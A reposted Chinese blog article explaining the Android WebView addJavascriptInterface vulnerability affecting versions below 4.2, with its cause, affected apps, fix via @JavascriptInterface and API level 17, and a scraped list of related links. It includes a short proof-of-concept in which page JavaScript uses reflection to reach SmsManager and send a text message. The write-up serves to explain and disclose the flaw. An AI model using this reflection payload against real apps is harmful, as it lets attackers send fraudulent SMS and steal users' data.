webview漏洞 -转
原文链接:http://www.cnblogs.com/goodhacker/p/3343837.html
一、漏洞描述
近期,微信等多款安卓流行应用曝出高危挂马漏洞:只要点击好友消息或朋友圈中的一条网址,手机就会自动执行黑客指令,出现被安装恶意扣费软件、向好友 发送欺诈短信、通讯录和短信被窃取等严重后果。在乌云漏洞平台上,包括安卓版微信、QQ、腾讯微博、QQ浏览器、快播、百度浏览器、金山浏览器等大批应用 均被曝光同类型漏洞。
二、影响版本
Android系统版本低于4.2
三、漏洞原理
漏洞点:WebView.addJavascriptInterface(Object obj, String interfaceName) ;
漏洞触发条件:
1、使用WebView.addJavascriptInterface方法注册可供javascript调用的java对象。
2、使用WebView加载外部网页。
3、Android系统版本低于4.2
漏洞原因:
Android系统通过WebView.addJavascriptInterface 方法注册可供javascript调用的java对象,以用于增强javascript的功能。但是系统并没有对注册JAVA类的方法调用的限制。导致攻击者可以利用反射机制调用未注册的其它任何JAVA类,最终导致javascript能力的无限增强。攻击者利用该漏洞可以根据客户端能力为所欲为。
四、POC代码
我们利用该漏洞调用SmsManager发送短信(被攻击APK要有短信发送权限)
1 WebView webview = new WebView(context); 2 3 WebSettings webset= webview.getSettings(); 4 webset.setJavaScriptEnabled(true); 5 webview.addJavascriptInterface(new JSInvoke(), "jsinvoke");
利用该漏洞的外部javascript脚本:
1 <script> 2 3 var obj_smsManager = jsinvoke.getClass().forName("android.telephony.SmsManager").getMethod("getDefault",null).invoke(null,null); 4 5 obj_smsManager.sendTextMessage("159********",null,"test",null,null); 6 7 </script>
出于安全考虑,为了防止Java层的函数被随便调用,Google在4.2版本之后,规定允许被调用的函数必须以 @JavascriptInterface进行注解,所以如果某应用依赖的API Level为17或者以上,就不会受该问题的影响(注:Android 4.2中API Level小于17的应用也会受影响)。在各应用厂商修复该问题期间,我们建议用户暂时使用系统自带的浏览器访问网页,并且不要访问社交应用中陌生人发来 的链接。
五、相关链接
http://drops.wooyun.org/papers/548
http://50.56.33.56/blog/?p=314
本文转自http://blog.csdn.net/androidsecurity/article/details/11131891
转载于:https://www.cnblogs.com/4-312/p/4329016.html
webview漏洞 -转相关推荐
- Android Webview 漏洞复现
Android Webview 漏洞复现 前言 触发条件 漏洞原理 漏洞复现 1. 运行环境 2.1 webview介绍 2.2 漏洞核心代码 2.3 JS攻击核心代码 2.4 效果展示 总结 前言 ...
- Android Webview历史高危漏洞与攻击面分析
文章目录 前言 WebView基础 极简Demo程序 JS调用Android 加载远程HTML 接口攻击场景 漏洞示例程序 本地攻击程序 url白名单校验 代码执行漏洞 JAVA反射机制 历史漏洞PO ...
- 移动端安全 - 安卓Android - 漏洞修复方案整理
敏感数据泄露 明文传输用户名.密码和验证码等敏感信息 MD5/Base64弱加密传输手机.密码等敏感信息 敏感信息在本地加密存储 后台服务器地址泄露. 边信道信息泄漏 在日志中对于密码等敏感信息进行加 ...
- Android 渗透测试学习手册 第七章 不太知名的 Android 漏洞
第七章 不太知名的 Android 漏洞 作者:Aditya Gupta 译者:飞龙 协议:CC BY-NC-SA 4.0 在本章中,我们将了解一些不太知名的 Android 攻击向量,这在 Andr ...
- (转载)JS与WebView交互存在的一些问题
JS与WebView交互存在的一些问题 作者 隔壁的李小宝 关注 2015.06.09 19:30 字数 2896 阅读 11117评论 3喜欢 35 一.背景概述 2013年Android平台暴露出 ...
- Carson带你学Android:你要的WebView与 JS 交互方式都在这里了
前言 现在很多App里都内置了Web网页(Hybrid App),比如说很多电商平台,淘宝.京东.聚划算等等,如下图 上述功能是由Android的WebView实现的,其中涉及到Android客户端与 ...
- Webview与Javascript
文章目录 0x01 WebView 概述 0x02 WebView 相关工具类 2.1 WebSettings 2.2 WebViewClient 2.3 WebChromeClient 0x03 W ...
- cordova 安装ssl证书_android webview https 证书
webview使用sslError解决https跳转报错的问题 到底如何使用WebView访问https的url--处理SslError呢? 在Android中,WebView是用来load http ...
- Carson带你学Android:这是一份全面详细的WebView学习攻略
前言 现在很多App里都内置了Web网页(Hybrid App),比如说很多电商平台,淘宝.京东.聚划算等等,如下图 那么这种该如何实现呢?其实这是Android里一个叫WebView组件实现 今天, ...
最新文章
- SAP PM概念学习
- python开发需要掌握哪些知识-人工智能需要学习哪些专业课程知识?
- 我的2017年文章汇总——Java及中间件篇
- 与老外交谈的常用句子
- 阅读类型HTML,W3C HTML5标准阅读笔记 – 元素分类与内容模型(Content Model)
- 前端技术周刊 2018-09-10:Redux Mobx
- Useful link
- 一文带你了解如何排查内存泄漏导致的页面卡顿现象
- python学习之课后习题
- 【好用的Mac分屏软件】Magnet for Mac 2.3
- Microsoft Visual C++ 2008 SP1 Redistributable Package (VC2008运行库)
- ISO/IEC 20000 信息技术(IT)服务管理体系及全套最新标准资料
- Houdini 官方HDA SideFX Labs 安装
- FPGA(七) PWM波
- 在安装软件CAJViewer时出现,“错误1327。无效驱动器:F:
- 边下边看的BT资源搜索工具:Tribler for Mac中文免费版
- AI+社区智能管理,赋能智慧城市人情共「智」
- 百度文库会员什么时候便宜
- 2021祥云杯 CTF pwn解 wp
- f2fs系列文章truncate
热门文章
- Windows截图工具合集
- 一文彻底说明分布式事务原理
- 测试吃鸡游戏帧数软件,高频内存吃鸡、CSGO帧数提高多少?这一测试告诉你
- linux网卡混杂模式和监听模式
- 每日新闻:徐小平:硬科技仍处在学习阶段;微软发布会定档10月2日 以升级现有产品线为主...
- uploadify多个文件上传,提示超过最多限制
- 全国计算机竞赛保送清华,35人!江苏2021清华、北大保送名单公布!
- python 调用百度云端人脸搜索
- TOJ 3498.Differences
- Turf.js(地理空间GIS分析的js库),处理地图相关算法